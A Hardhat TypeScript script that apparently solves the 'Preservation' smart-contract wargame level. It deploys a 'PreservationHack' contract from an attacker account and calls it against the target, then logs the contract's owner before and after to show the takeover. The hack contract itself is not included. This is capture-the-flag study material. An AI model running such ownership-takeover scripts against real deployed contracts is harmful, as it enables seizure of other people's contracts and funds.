import { fail } from "assert";
import { ethers } from "hardhat";

// Why need to run two times?
async function preservationExploit() {
  const preservationAddress = process.env.PRESERVATION_ADDRESS || fail("PRESERVATION_ADDRESS Not Found In .env");
  const preservation = await ethers.getContractAt("Preservation", preservationAddress);
  const [attacker] = await ethers.getSigners();

  console.log("Old owner : ", await preservation.owner());

  const PreservationHack = await ethers.getContractFactory("PreservationHack");
  const preservationHack = await PreservationHack.connect(attacker).deploy();
  await preservationHack.deployed();
  const tx = await preservationHack.connect(attacker).hack(preservation.address);
  await tx.wait();

  console.log("New owner : ", await preservation.owner());

  console.log("SUCCESS!!! Submit the instance.");
}

preservationExploit().catch((error) => {
  console.error(error);
  process.exitCode = 1;
});
